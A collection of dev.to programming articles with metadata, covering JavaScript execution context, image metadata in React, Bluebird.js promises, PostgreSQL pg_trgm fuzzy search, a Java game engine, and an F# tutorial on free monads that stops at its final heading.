694,311 | How Does JS code run - Execution context and Call stack | Do you know how javascript code runs in the javascript engine? If not, then I hope this post will b... | 12,692 | 2021-05-11T02:46:24 | https://dev.to/prashan81992916/how-does-js-code-run-execution-context-and-call-stack-3a7 | javascript, codenewbie, executioncontext, webdev | Do you know how javascript code runs in the javascript engine?
If not, then I hope this post will be useful for understanding execution context and how the order of execution context is maintained by call stack.This fundamental concept also pays way to have the foundation to comprehend hoisting, scopes, scope chains, and closures
So lets start,
Before diving deep into the concept, we must have the basic understanding that ``Javascript is synchronous and single threaded``,
1.Synchrounous - control waits until the particular code
is executed and only then it moves to the
next line.
2.Single threaded - only one call stack(explained below)
(ie) During memory creation phase and code execution phase in the Execution context, js code is executed line by line.
__Execution context__
``From here onwards I will be addressing execution context as EC``
Whenever we run a javascript code, a global EC is created, which comprises mainly of two phases,
1. Memory creation phase
2. Code execution or thread of execution phase
Let me explain this with a simple example,
```javascript
var a = 5;
function Square(a){
return a * a;
};
var total = Square(a);
```
As I mentioned before when we run this code, a global EC is created and the memory creation phase starts.


__1. Memory creation phase__
This phase is mainly about allocating memory for the variables and functions declared in the code.The js engine looks for the variables and functions from the first line synchronously. It is important to note that during this phase,
1. For variables, a special keyword - undefined is
initialized by default
2. For functions, the function code is copied as it is.
So in the above example variable ``a`` and ``isColorPrinted`` is initialized with keyword ``undefined`` and for the ``Square`` function, ``function code`` is copied as it is.
It's very important to understand this, because it will be easy to understand why variable hoisting happens in js, which I will be covering in the another post😉.
__2. Code execution phase__
After completing the memory creation phase, the code gets executed right from the first line synchronously. So in the above example, the assignment ``a = 5`` replaces ``undefined`` for ``a`` in memory.When the control reaches the function invocation ``Square(a)`` a new EC is created within the global EC. Again for the new EC it has to repeat two phases. After memory creation and code execution phase are over, the value returned will be assigned to``isColorPrinted``in the memory part of global EC and newly created EC will be permantly deleted,If anymore function invocation happens then a new EC is created.For nested function,an EC will be created within the parent EC.

But for deeply nested functions and other complex scenarios it becomes really tough to manage the execution contexts, so here comes to our aid - ``call Stack``
__Call Stack__
Call stack is responsible for managing the order of exection of EC's. When the js code runs,
1. Initially:
the global EC is pushed into the stack.
2. After a function invocation:
The newly created EC is pushed on top of the global
EC,
3. When function execution is over:
It pops the EC out of the stack.
4 When the entire program is executed:
It pops the global EC out of the stack.
For nested functions:
The child EC is pushed on top of the parent EC.
For infinite loop:
Call stack crashes as it is completely filled with
EC's and max memory is reached
I hope this was insightful! Let me know in the comments .
Don't forget to follow me!!! I will be explaining hoisting, scope, and closures in the upcoming posts using the stuff you learn here(execution context).
| prashan81992916 |
694,966 | How to gets uploaded image Metadata on the front-end | Quite often when we implement uploading images, will be great to have the opportunity somehow to get... | 0 | 2021-06-04T15:05:21 | https://dev.to/detoner777/how-to-gets-uploaded-image-metadata-on-the-front-end-2h1k | react, metadata, filereader, javascript | Quite often when we implement uploading images, will be great to have the opportunity somehow to get image metadata (with, height, fileSize, name ..) in the front-end directly
Example of the input, with uploading the image file:
```javascript
<input type="file" name="myImage" accept="image/png, image/gif, image/jpeg" onChange={ (e) => handleChange(e.target.files) } />
```
to get the name, file size and extension of the uploaded file:
```javascript
const file = e.target.files[0]
const { name } = file
const fileExtension = name.split('.').pop()
const fileSize = file.size
```
in the case, if needs to get local URL thats used to show render uploaded image:
```javascript
const localUrl = URL.createObjectURL(file)
```
To get width, height, of the uploaded image use new FileReader() with image.decode() method:
```javascript
var reader = new FileReader()
reader.onload = async (e: any) => {
let image = new Image()
image.src = e.target.result
await image.decode()
// now we can:
const width = image.width
const height = image.height
}
reader.readAsDataURL(file)
```
this is async logic so a better way to use it in a project is to wrap it up with a new Promise, I use the async function wrapper to get all needed metadata:
```javascript
// Function takes single uploaded img file, and returns width, height, fileSize and fileExtension
export const getImageMeta = async (
file: File
): Promise<{
width: number,
height: number,
fileSize: number,
fileExtension: string,
localUrl: string,
}> => {
const { name } = file
const fileExtension = name.split('.').pop()
const localUrl = URL.createObjectURL(file)
// reading a file to get height and width
async function getImageParams(file: File) {
return new Promise((resolve, reject) => {
var reader = new FileReader()
reader.onload = async (e: any) => {
var image = new Image()
image.src = e.target.result
await image.decode()
resolve({ width: image.width, height: image.height })
}
reader.readAsDataURL(file)
})
}
const { width, height } = await getImageParams(file)
return { width, height, fileSize: file.size, fileExtension, localUrl }
}
``` | detoner777 |
694,970 | MovingPoint-Lightweight-Java-2D-Game-Engine | Find repo here: https://github.com/MarcoSteinke/MovingPoint-Lightweight-Java-2D-Game-Engine 1 Beginn... | 0 | 2021-05-11T14:02:39 | https://dev.to/marcosteinke/movingpoint-lightweight-java-2d-game-engine-2m7l | Find repo here: https://github.com/MarcoSteinke/MovingPoint-Lightweight-Java-2D-Game-Engine
1 Beginner Friendly / Educational
+ I love programming and I also love teaching it to other persons, so the main goal of MovingPoint is to bring new motivated talents into programming. + A lot of people dream of creating their own games, MovingPoint gives them a first impression of Game Design + Even childs with basic Java skills could use this to create simple games like TicTacToe or Snake!
2 Operating System Independence
+ since MovingPoint is written in pure Java, you can run it on any Operating System
3 Hardware Independence
+ MovingPoint is lightweight, you do not need the latest hardware to build your games. + You also do not need to import all modules, only use the code which you need to build your project.
4 Use all Java libraries!
+ Yes it is true. You can run any libraries and connect them to MovingPoint + You are able to create Browsergames by running a Java Webapplication and importing MovingPoint. + Also usable to create Android Apps by using Android Studio!
5 Open source
+ Since I am coding for around 5 years and I tried out many different things, this is my first try on writing a Game Engine, so I want everybody to help me with the development. + You are able to use the Engine as you want to. Modify it, give me tips and together we can create a new experience of Game Design. | marcosteinke | |
694,990 | PHP 8 Multiple Files/Images Upload in MySQL Database Example Tutorial
| Hi Guys, In this tutorial,I will learn you how to multiple image and file upload in mysql database u... | 0 | 2021-05-11T14:52:44 | https://dev.to/sonagrabhavesh/php-8-multiple-files-images-upload-in-mysql-database-example-tutorial-3e9d | php, laravel, mysql, programming | <p>Hi Guys,</p>
<p>In this tutorial,I will learn you how to multiple image and file upload in mysql database using php 8.you can easy and simply multiple image and file upload in mysql database using php 8.</p>
<p>File upload in PHP is the most common feature that almost every PHP developer has to build. As we can know, file uploading functionality is required in nearly every web application.In this tutorial, we will learn how to upload single or multiple files or images in PHP 8 and how to save the images in MySQL database.</p>
<p>Because of when it comes to uploading multiple images or files we require to cerebrate some logic and process how to do that. But sometimes you have a requisite to upload multiple images at once.</p>
<p>In this tutorial, we will implement all these processes, step by step.</p>
<ul>
<li>Create a database table.</li>
<li>Create an image/file uploading form.</li>
<li>The database connection file.</li>
<li>The image uploads the logic script file.</li>
<li>Complete Code</li>
</ul>
if you want to see full example follow bellow link..
https://codingtracker.blogspot.com/2021/05/php-8-multiple-filesimages-upload-in.html | sonagrabhavesh |
695,080 | Simple Bluebird.Js Cheat Sheet | Reference Official documentation Bluebird.Js Cheat Sheet Generators User.... | 0 | 2021-05-11T16:28:07 | https://dev.to/hoanganhlam/simple-bluebird-js-cheat-sheet-8k4 | cheatsheet, bluebird | ### Reference
* [Official documentation](http://bluebirdjs.com/docs/api-reference.html)
* [Bluebird.Js Cheat Sheet](https://cheatsheetmaker.com/bluebirdjs)
### Generators
```
User.login = Promise.coroutine(function* (email, password) {
let user = yield User.find({email: email}).fetch()
return user
})
```
See [Promise.coroutine](http://bluebirdjs.com/docs/api/promise.coroutine.html).
### Promise-returning methods
```
User.login = Promise.method((email, password) => {
if (!valid)
throw new Error("Email not valid")
return /* promise */
})
```
See [Promise.method](http://bluebirdjs.com/docs/api/promise.method.html).
### Node-style functions
```
var readFile = Promise.promisify(fs.readFile)
var fs = Promise.promisifyAll(require('fs'))
```
See [Promisification](http://bluebirdjs.com/docs/api/promisification.html).
### Chain of promises
```
function getPhotos() {
return Promise.try(() => {
if (err) throw new Error("boo")
return result
})
}
getPhotos().then(···)
```
Use [Promise.try](http://bluebirdjs.com/docs/api/promise.try.html).
### Object
```
Promise.props({
photos: get('photos'),
posts: get('posts')
})
.then(res => {
res.photos
res.posts
})
```
Use [Promise.props](http://bluebirdjs.com/docs/api/promise.props.html).
### Multiple promises (array)
* [Promise.all](http://bluebirdjs.com/docs/api/promise.all.html)(\[p\]) - expect all to pass
* [Promise.some](http://bluebirdjs.com/docs/api/promise.some.html)(\[p\], count) - expect `count` to pass
* [Promise.any](http://bluebirdjs.com/docs/api/promise.any.html)(\[p\]) - same as `some([p], 1)`
* [Promise.race](http://bluebirdjs.com/docs/api/promise.race.html)(\[p\], count) - use `.any` instead
* [Promise.map](http://bluebirdjs.com/docs/api/promise.map.html)(\[p\], fn, options) - supports concurrency
```
Promise.all([ promise1, promise2 ])
.then(results => {
results[0]
results[1]
})
// succeeds if one succeeds first
Promise.any(promises)
.then(results => {
})
```
```
Promise.map(urls, url => fetch(url))
.then(···)
```
Use [Promise.map](http://bluebirdjs.com/docs/api/promise.map.html) to "promisify" a list of values.### Multiple promises
```
Promise.join(
getPictures(),
getMessages(),
getTweets(),
function (pics, msgs, tweets) {
return ···
}
)
```
Use [Promise.join](http://bluebirdjs.com/docs/api/promise.join.html)
### Multiple return values
```
.then(function () { return [ 'abc', 'def' ] })
```
Use [Promise.spread](http://bluebirdjs.com/docs/api/promise.spread.html)
### Example
```js
promise
.then(okFn, errFn)
.spread(okFn, errFn) // *
.catch(errFn)
.catch(TypeError, errFn) // *
.finally(fn)
.map(function (e) { ··· }) // *
.each(function (e) { ··· }) // *
```
Those marked with `*` are non-standard Promise API that only works with Bluebird promises.
| hoanganhlam |
695,261 | String similarity search and fast LIKE operator using pg_trgm | SQL supports wildcard search on strings using LIKE operator which accepts % and _ wildcards. The prob... | 0 | 2021-05-11T20:58:37 | https://mazeez.dev/posts/pg-trgm-similarity-search-and-fast-like | postgres, pgtrgm, search |
SQL supports wildcard search on strings using `LIKE` operator which accepts `%` and `_` wildcards. The problem with `LIKE` is it's not very fast if you have a lot of rows and the query is [non-sargable](https://en.wikipedia.org/wiki/Sargable). And in some cases you need to provide fuzzy search capabilities where the results don't have to exactly match the query.
PostgreSQL has the [`pg_trgm` extension](https://www.postgresql.org/docs/9.6/pgtrgm.html) that solves both problems:
- It has `gin` and `gist` indexes for speeding up `LIKE` and other string operators
- It has `similarity` function and `%` operator for string similarity search using trigrams.
Let's assume we have this table:
```sql
CREATE TABLE persons (
id int4 NOT NULL GENERATED ALWAYS AS IDENTITY,
forenames varchar(100) NOT NULL,
surname varchar(100) NOT NULL,
forenames_normalized varchar(100) NOT NULL,
surname_normalized varchar(100) NOT NULL,
CONSTRAINT persons_pk PRIMARY KEY (id)
);
```
**Note:** Normalized columns are lowercase versions of the normal columns and special characters are removed. You can also remove character accents. This is to make the search experience better for the user as they don't have to type in the exact case and punctuations.
I inserted 10M rows of fake data generated by [Bogus](https://github.com/bchavez/Bogus) into the table. You can [download the dump here](http://github.com/mhmd-azeez/PgTrgm).
If we run a `LIKE` query on it:
```sql
select * from persons p
where surname_normalized like '%tche%' and forenames_normalized like '%nde%'
```
On my laptop it takes PostgreSQL about a second to return the results:
```sql
Gather (cost=1000.00..142174.75 rows=10 width=30) (actual time=9.719..639.460 rows=75 loops=1)
Workers Planned: 2
Workers Launched: 2
-> Parallel Seq Scan on persons p (cost=0.00..141173.75 rows=4 width=30) (actual time=3.425..605.240 rows=25 loops=3)
Filter: (((surname_normalized)::text ~~ '%tche%'::text) AND ((forenames_normalized)::text ~~ '%nde%'::text))
Rows Removed by Filter: 3333308
Planning Time: 0.097 ms
Execution Time: 639.494 ms
```
It seems like all of rows rows are scanned in the table. To speed things up, first we need to enable the `pg_trgm` extension on the database:
```sql
create extension if not exists pg_trgm;
```
Then we can use the `gin` index on the normalized columns:
```sql
create index if not exists idx_gin_persons_on_names on persons using gin (forenames_normalized gin_trgm_ops, surname_normalized gin_trgm_ops)
```
**Note:** `gin` index and `gin_trgm_ops` operator are part of `pg_trgm`.
Adding the `gin` index took about a minute on my laptop for 10M rows.
Now let's see if the results have improved:
```sql
Bitmap Heap Scan on persons p (cost=54.20..3692.46 rows=995 width=30) (actual time=4.011..4.066 rows=75 loops=1)
Recheck Cond: (((forenames_normalized)::text ~~ '%nde%'::text) AND ((surname_normalized)::text ~~ '%tche%'::text))
Heap Blocks: exact=75
-> Bitmap Index Scan on idx_gin_persons_on_names (cost=0.00..53.95 rows=995 width=0) (actual time=3.999..3.999 rows=75 loops=1)
Index Cond: (((forenames_normalized)::text ~~ '%nde%'::text) AND ((surname_normalized)::text ~~ '%tche%'::text))
Planning Time: 0.092 ms
Execution Time: 4.120 ms
```
Instead of `639.494 ms` for execution time, now it only takes `4.1 ms`! That's because instead of sequentially scanning all of the rows in the document, it scanned the `gin` index.
Great, now let's take a look at how to do fuzzy search:
Let's say we are trying to find someone with forename(s) of `anderson` and surname of `mitchell`:
```sql
select id, forenames, surname, ((similarity('mitchel', surname_normalized) + similarity('andersen', forenames_normalized)) / 2) as score from persons p
order by score desc
limit 10
```
This query takes about 58 seconds to complete. The `similarity` function is expensive, so we have to try not to use it as much as possible. For that, we can use the similarity operator (`%`) to filter out the rows that are below a certain threshold. By default the threshold is 30% similarity (`0.3`) but you can change that using `set_limit`. Now let's use it:
```sql
select id, forenames, surname, ((similarity('mitchel', surname_normalized) + similarity('andersen', forenames_normalized)) / 2) as score from persons p
where forenames_normalized % 'andersen' and surname_normalized % 'mitchel'
order by score desc
limit 10
```
Now it takes about `100ms` on my laptop. A huge improvement over 58 seconds :)
## Edge Cases
`pg_trgm` uses tri-grams for indexing. It means that each string is broken into all possible 3 letter components. For example `mitchel`'s trigrams are: `mit`,`itc`,`tch`,`che`,`hel` and `michelle`'s trigrams are: `mic`,`ich`,`che`,`hel`,`ell`,`lle`. They share 2 trigrams so the similarity of `mitchel` with `michelle` is 30%.
This approach is not useful for words that are less than 3 letters. As you can't form any trigrams. So this query:
```sql
select * from persons p
where surname_normalized like '%he%' and forenames_normalized like '%de%'
```
Takes the same amount of time on both the indexed table and the non-indexed table because PostgreSQL does sequential scan for both of them:
```sql
Gather (cost=1000.00..147095.90 rows=49229 width=30) (actual time=1.169..655.329 rows=21216 loops=1)
Workers Planned: 2
Workers Launched: 2
-> Parallel Seq Scan on persons p (cost=0.00..141173.00 rows=20512 width=30) (actual time=0.397..583.521 rows=7072 loops=3)
Filter: (((surname_normalized)::text ~~ '%he%'::text) AND ((forenames_normalized)::text ~~ '%de%'::text))
Rows Removed by Filter: 3326261
Planning Time: 0.105 ms
Execution Time: 655.974 ms
```
There can be cases where the index makes things slower. So please test it for your own use case and weight the trade-offs. Also keep in mind that [inserts and updates take longer with the index](https://iamsafts.com/posts/postgres-gin-performance/).
## Benchmarks
I wrote some very simple benchmarks using [BenchmarkDotNet](https://github.com/dotnet/BenchmarkDotNet) and here is the results:
```
// * Summary *
BenchmarkDotNet=v0.12.1, OS=Windows 10.0.19041.928 (2004/?/20H1)
Intel Core i7-8550U CPU 1.80GHz (Kaby Lake R), 1 CPU, 8 logical and 4 physical cores
.NET Core SDK=5.0.201
[Host] : .NET Core 5.0.4 (CoreCLR 5.0.421.11614, CoreFX 5.0.421.11614), X64 RyuJIT
DefaultJob : .NET Core 5.0.4 (CoreCLR 5.0.421.11614, CoreFX 5.0.421.11614), X64 RyuJIT
| Method | Mean | Error | StdDev | Median |
|---------------------:|-------------:|-----------:|-----------:|-----------:|
| LikeOnGinIndex | 5.398 ms | 0.7167 ms | 2.113 ms | 4.170 ms |
| Like | 1,035.140 ms | 55.0098 ms | 158.716 ms | 991.495 ms |
| SimilarityOnGinIndex | 137.339 ms | 14.7610 ms | 43.523 ms | 114.342 ms |
```
**Note**: Please download the database dump and code on [GitHub](http://github.com/mhmd-azeez/PgTrgm). | mhmd_azeez |
695,269 | Grokking Free Monads | In this post I’m going to try and demystify free monads and show you that they’re not some strange ab... | 12,008 | 2021-05-14T19:33:19 | https://dev.to/choc13/grokking-free-monads-9jd | fsharp, functional, programming, grokking | In this post I’m going to try and demystify free monads and show you that they’re not some strange abstract creature, but in fact can be very useful for solving certain problems. Rather than focusing on the theory, our aim here will be to get a solid intuition about free monads, you'll then find learning the theory much easier. So in keeping with the rest of this series we’ll discover the free monad ourselves by solving a real software problem.
# Pre-requisites
I try to keep these posts as independent from each other as possible, but in this case there's not much getting around the fact that you're probably going to need to have already grokked monads. If you haven't yet done so, then have a browse through [Grokking Monads](https://dev.to/choc13/grokking-monads-in-f-3j7f) and once you're done you'll be all set to continue here.
# The Scenario
Let's say we work at an e-commerce store and we need to implement a `chargeUser` function. This function should take a `UserId` and an `amount`. It should lookup the user's profile to get hold of the credit card, then it should charge the user's card the specified amount. If the user has an email address it should send them a receipt.
```fsharp
type EmailAddress = EmailAddress of string
type Email =
{ To: EmailAddress
Body: string }
type CreditCard =
{ Number: string
Expiry: string
Cvv: string }
type TransactionId = TransactionId of string
type UserId = UserId of string
type User =
{ Id: UserId
CreditCard: CreditCard
EmailAddress: EmailAddress option }
let chargeUser (amount: float) (userId: UserId): TransactionId =
// TODO: Implement this as part of the domain model
```
Our main aim in this post is to be able to write the `chargeUser` function in our domain model. By domain model, we're referring to the very thing we're writing our program for in the first place. In this case as we're an e-commerce store that means our domain model includes things like user profiles, products and orders.
Typically when we write our application we want to keep our domain model completely decoupled from any infrastructure or application layer code, because those things are the incidental complexity that we have to solve. Our domain model should be pure and abstract in the sense that if we were to use a different database or a different cloud provider, the domain model should be unaffected.
It's easy to write types in our domain layer to represent the objects in the model without introducing any unwanted coupling, but what about the functions like `chargeUser`? On the one hand we know it's going to need to call external services, so does that mean we should define it outside of the domain model where we have access to the database etc? On the other hand it's not uncommon to want to take decisions in functions like this, such as whether or not we should email the user a receipt, and that logic definitely feels like domain logic that we'd want to test independent of the database.
# Functions as data
There are several ways to make domain operations pure and agnostic to any infrastructure concerns. We've touched on one before in [Grokking the Reader Monad](https://dev.to/choc13/grokking-monads-in-f-3j7f). One interesting way to do it though is to treat functions as if they were data.
What do we mean by functions as data? The best way to understand this is to see some code. Let's take the `chargeUser` function and write a data model to describe the operations it needs to perform.
```fsharp
type ChargeUserOperations =
| LookupUser of (UserId -> User)
| ChargeCreditCard of (float -> CreditCard -> TransactionId)
| EmailReceipt of (Email -> unit)
```
We've created a type called `ChargeUserOperations` that has a case for each of the operations we want to perform as part of `chargeUser`. Each case is parameterised by the function signature that we want it to have. So instead of being functions that we call, we've just got some abstract data representing the functions that we want to invoke and we'd like to use it like so.
```fsharp
let chargeUser amount userId: TransactionId =
let user = LookupUser userId
let transactionId = ChargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
let email =
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
EmailReceipt email
return transactionId
| None -> return transactionId
```
Obviously, this isn't going to work. We can't simply write `LookupUser userId` and assign that to something of type `User`. For starters `LookupUser` is expecting a function as an argument, not a `UserId`. This idea of functions as data is an interesting one though, so let's see if we can find a way to make it work.
It doesn't really make sense to try and extract a return value from data. All we can really do with data is create it. So what about if we instead created each operation with another operation nested inside it, kind of like a callback that would take the output of the current computation and produce a new output. Something like this.
```fsharp
type ChargeUserOperation =
| LookupUser of (UserId * (User -> ChargeUserOperation)
| ChargeCreditCard of (float * CreditCard * (TransactionId -> ChargeUserOperation)
| EmailReceipt of (Email * (unit -> ChargeUserOperation)
```
We've made a couple of changes here. Firstly each operation is now parameterised by a tuple instead of a function. We can think of the tuple as the list of arguments to the function. Secondly, the final argument in the tuple is our callback. What that’s saying is that when you create an operation, you should tell it which operation you'd like to perform next that needs the result of this one. Let's give this new format a try.
```fsharp
let chargeUser (amount: float) (userId: UserId): TransactionId =
LookupUser(
userId,
(fun user ->
ChargeCreditCard(
(amount, user.CreditCard),
(fun transactionId ->
match user.EmailAddress with
| Some emailAddress ->
EmailReceipt(
{ To = emailAddress
Body = $"TransactionId {transactionId}" },
(fun _ -> // Hmmm, how do we get out of this?)
)
| None -> // Hmmm, how do we get out of this?)
))
)
```
Ok, it's getting better. We can see that this data structure is capturing the abstract logic of what the `chargeUser` function needs to do, without actually depending on any particular implementation. The only snag is we don't have a way to return a value at the end. Each of our operations has been defined such that it needs to be passed another callback, so how do we signal that we should actually just return a value?
What we need is a case in `ChargeUserOperation` that doesn't require a callback, one that just "returns" a value. Let's call it `Return`. We also need to make `ChargeUserOperation` generic on the return type to encapsulate the fact that each operation returns some value, but that the values returned by each operation might differ.
```fsharp
type ChargeUserOperation<'next> =
| LookupUser of (UserId * (User -> ChargeUserOperation<'next>))
| ChargeCreditCard of (float * CreditCard * (TransactionId -> ChargeUserOperation<'next>))
| EmailReceipt of (Email * (unit -> ChargeUserOperation<'next>))
| Return of 'next
```
We've chosen the name `'next` for the generic parameter to signify the fact that it's the value returned by the "next" computation in the chain. In the case of `Return` then it's just immediately "returned". We're now finally in a position to write `chargeUser`.
```fsharp
let chargeUser (amount: float) (userId: UserId): ChargeUserOperation<TransactionId> =
LookupUser(
userId,
(fun user ->
ChargeCreditCard(
(amount, user.CreditCard),
(fun transactionId ->
match user.EmailAddress with
| Some emailAddress ->
EmailReceipt(
{ To = emailAddress
Body = $"TransactionId {transactionId}" },
(fun _ -> Return transactionId)
)
| None -> Return transactionId)
))
)
```
That's it! We've captured the logic of `chargeUser` in a completely abstract data structure. We know that it's got no dependence on any infrastructure because we fabricated it purely out of data types. We've taken our domain modelling to the next level, by modelling its computations as data too! ✅
One thing to note is that `chargeUser` now returns `ChargeUserOperation<TransactionId>`. This might seem weird, but we can think of it this way; `chargeUser` is now a function that produces a data structure which represents the the domain operation of charging and user and returning the `TransactionId`.
If you've grokked it this far, then you've made the fundamental mental leap; the fact that we're just representing a computation as data. The rest of this post is just going to be dedicated to cleaning this up to make it easier to read and write `chargeUser`. Things might get a bit abstract, but just keep in mind the fact that all we're doing is trying to build this data structure to represent our computation.
# Flattening the pyramid ⏪
One problem with `chargeUser` in its current form is that we're back in nested callback hell, (a.k.a the [Pyramid of Doom](https://en.wikipedia.org/wiki/Pyramid_of_doom_(programming)). We already know that monads are useful at flattening nested computations, so let's see if we can make `ChargeUserOperation` a monad.
The recipe for making something a monad is to implement `bind` for that type. We start by defining the types for the function signature and use that to guide us. In this case the signature is.
```fsharp
('a -> ChargeUserOperation<'b>) -> ChargeUserOperation<'a> -> ChargeUserOperation<'b>
```
So we're going to have to unwrap the `ChargeUserOperation` to get at the value `'a` and then apply that the to the function we've been passed to generate a `ChargeUserOperation<'b>`. Let's get stuck in.
```fsharp
let bind (f: 'a -> ChargeUserOperation<'b>) (a: ChargeUserOperation<'a>) =
match a with
| LookupUser (userId, next) -> ??
| ChargeCreditCard (amount, card, next) -> ??
| EmailReceipt (unit, next) -> ??
| Return x -> f x
```
As usual we've used a pattern match to unwrap the `ChargeUserOperation` in order to get at the inner value. In the case of `Return` it's a straight forward case of just calling `f` on the value `x`. But what about for those other operations? We don't have a value of type `'a` to hand, so how can we invoke `f`?
Well what we do have to hand is `next` which is capable of producing a new `ChargeUserOperation` when supplied with a value. So what we can do is call that and recursively pass this new `ChargeUserOperation` to `bind`. The idea being that by recursively calling `bind` we'll eventually hit the `Return` case, at which point we can successfully extract the value and call `f` on it.
```fsharp
module ChargeUserOperation =
let rec bind (f: 'a -> ChargeUserOperation<'b>) (a: ChargeUserOperation<'a>) =
match a with
| LookupUser (userId, next) -> LookupUser(userId, (fun user -> bind f (next user)))
| ChargeCreditCard (amount, card, next) ->
ChargeCreditCard(amount, card, (fun transactionId -> bind f (next transactionId)))
| EmailReceipt (email, next) ->
EmailReceipt(email, (fun () -> bind f (next())))
| Return x -> f x
```
This might be a bit mind bending, but another way to view it is that we're just doing exactly the same callback nesting that we were forced to do by hand when we previously wrote `chargeUser`. Except now we've hidden the act of nesting these operations inside the `bind` function.
Each call to bind introduces another layer of nesting and pushes the `Return` down inside this new layer. For example if we had written `LookupUser(userId, Return) |> bind (fun user -> ChargeCreditCard(amount, user.CreditCard, Return))` it would be equivalent to writing it in nested form like `LookupUser(userId, (fun user -> ChargeCreditCard(amount, user.CreditCard, Return))`.
With that we can easily write a computation expression called `chargeUserOperation` and use it to flatten that pyramid in `chargeUser`.
```fsharp
type ChargeUserOperationBuilder() =
member _.Bind(a, f) = ChargeUserOperation.bind f a
member x.Combine(a, b) = x.Bind(a, (fun () -> b))
member _.Return(x) = Return x
member _.ReturnFrom(x) = x
member _.Zero() = Return()
let chargeUserOperation = ChargeUserOperationBuilder()
let chargeUser (amount: float) (userId: UserId) =
chargeUserOperation {
let! user = LookupUser(userId, Return)
let! transactionId = ChargeCreditCard((amount, user.CreditCard), Return)
match user.EmailAddress with
| Some emailAddress ->
let email =
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
do! EmailReceipt(email, Return)
return transactionId
| None -> return transactionId
}
```
If `do!` is unfamiliar then it’s basically just `let!` except it ignores the result. Which we don’t care about when sending them email because it returns `unit` anyway.
# Making data look like functions 🥸
The function is looking pretty nice now, but it's perhaps a bit unnatural to have to write `LookupUser(userId, Return)` instead of just `lookupUser userId`. It's also a bit annoying to have to constantly keep writing `Return` as the final argument to the `ChargeUserOperation` case constructors. Well it's easy to fix that, we can just write a "smart constructor" for each case that hides that detail away.
```fsharp
let lookupUser userId = LookupUser(userId, Return)
let chargeCreditCard amount card = ChargeCreditCard(amount, card, Return)
let emailReceipt email = EmailReceipt(email, Return)
let chargeUser (amount: float) (userId: UserId) =
chargeUserWorkflow {
let! user = lookupUser userId
let! transactionId = chargeCreditCard amount user.CreditCard
match user.EmailAdress with
| Some emailAddress ->
do!
emailReceipt
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
return transactionId
| None -> return transactionId
}
```
🔥 Nice! Now the function perfectly expresses the logic of our operation. It looks just like a regular monadic function, except under the hood it's actually building up an abstract data structure that represents our desired computation, rather than invoking any real calls to real infrastructure.
# Factoring out a functor
Our `chargeUser` function is looking pretty good now, but there's some optimisations we can make to the definition of `ChargeUserOperation`. Let's consider what would happen if we wanted to write a different computation. We'd have to write a data type with a case for each operation we want to support, plus a case for `Return` and then finally implement `bind` for it. Wouldn't it be nice if we could implement `bind` once for any computation type?
Let's take a look at the definition of `bind` for `ChargeUserOperation` again and see if we can refactor it to something a bit more generic.
```fsharp
let rec bind (f: 'a -> ChargeUserOperation<'b>) (a: ChargeUserOperation<'a>) =
match a with
| LookupUser (userId, next) -> LookupUser(userId, (fun user -> bind f (next user)))
| ChargeCreditCard (amount, card, next) ->
ChargeCreditCard(amount, card, (fun transactionId -> bind f (next transactionId)))
| EmailReceipt (email, next) ->
EmailReceipt(email, (fun () -> bind f (next ())))
| Return x -> f x
```
If we mandate that each operation must be of the form `Operation of ('inputs * (‘output -> Operation<'next>)` then they only differ by parameter types, which we could make generic. How should we do this for `ChargeCreditCard` though, because that currently has two inputs. Well we can combine the inputs into a single tuple like this `ChargeCreditCard of ((float * CreditCard) * (TransactionId -> ChargeUserOperation<'next>))`.
The form of `bind` for each operation is now identical, specifically it is `Operation(inputs, next) -> Operation(inputs, (fun output -> bind f (next output))`. So really, we actually only have two cases to consider, either it's an `Operation` or it's a `Return`. So let's create a type called `Computation` that encapsulates that.
```fsharp
type Computation<'op, 'next> =
| Operation of 'op
| Return of 'next
```
Which we can write `bind` for to turn it into a monad.
```fsharp
let rec inline bind (f: 'a -> Computation< ^op, 'b >) (a: Computation< ^op, 'a >) =
match a with
| Operation op -> Operation(op |> map (bind f))
| Return x -> f x
```
The trick to making this work in the `Operation` case is to note that we require each `Operation` to be mappable. That is, we require it to be a functor. Mapping an operation is just a case of applying the function to the return value to transform it into something else. So by recursively calling `bind f`, as we did when writing for this `ChargeUserOperation`, we eventually hit the `Return` case, get access to the return value and just apply the current `op` to it by calling `map`.
So now when we're writing our operations we've reduced the task from having to implement `bind` to instead having to implement `map`, which is an easier task. For example we can express `ChargeUserOperation` like this.
```fsharp
type ChargeUserOperation<'next> =
| LookupUser of UserId * (User -> 'next)
| ChargeCreditCard of (float * CreditCard) * (TransactionId -> 'next)
| EmailReceipt of Email * (unit -> 'next)
static member Map(op, f) =
match op with
| LookupUser (x, next) -> LookupUser(x, next >> f)
| ChargeCreditCard (x, next) -> ChargeCreditCard(x, next >> f)
| EmailReceipt (x, next) -> EmailReceipt(x, next >> f)
```
Unfortunately, we can't eliminate any more boilerplate beyond here in F#. In other languages like Haskell it is possible to automatically derive the `Map` function for the operation functors, but in F# using FSharpPlus the best we can do today is write the `static member Map` ourselves. FSharpPlus then provides us the `map` function which will automatically pick the correct one by calling this `static member Map` when mapping an instance of `ChargeUserOperation` through the use of statically resolved type parameters.
We just have one final change to make to the smart constructors. Now that `ChargeUserOperation` is now just a functor, we need to lift them up into the `Computation` monad by wrapping them in an `Operation`.
```fsharp
let lookupUser userId = LookupUser(userId, Return) |> Operation
let chargeCreditCard amount card =
ChargeCreditCard((amount, card), Return) |> Operation
let emailReceipt email =
EmailReceipt(email, Return) |> Operation
let chargeUser (amount: float) (userId: UserId) =
computation {
let! user = lookupUser userId
let! transactionId = chargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
do!
emailReceipt
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
return transactionId
| None -> return transactionId
}
```
# You just discovered the Free Monad 🥳
The data type we called `Computation` is usually called `Free`, the `Operation` case is often called `Roll` and the `Return` case is often called `Pure`. Other than that though we've discovered the basis of the free monad. It's just a data type and associated `bind` function that fundamentally describes sequential computations.
If you're a C# developer and you're familiar with LINQ then this might seem familiar to you. LINQ provides a way to build up a computation and defer its evaluation until sometime later. It's what allows LINQ to run in different environments, such as in a DB, because people are able to write interprets for it that turn the LINQ statements into SQL etc on the database server.
# Should I use free monads 🤔
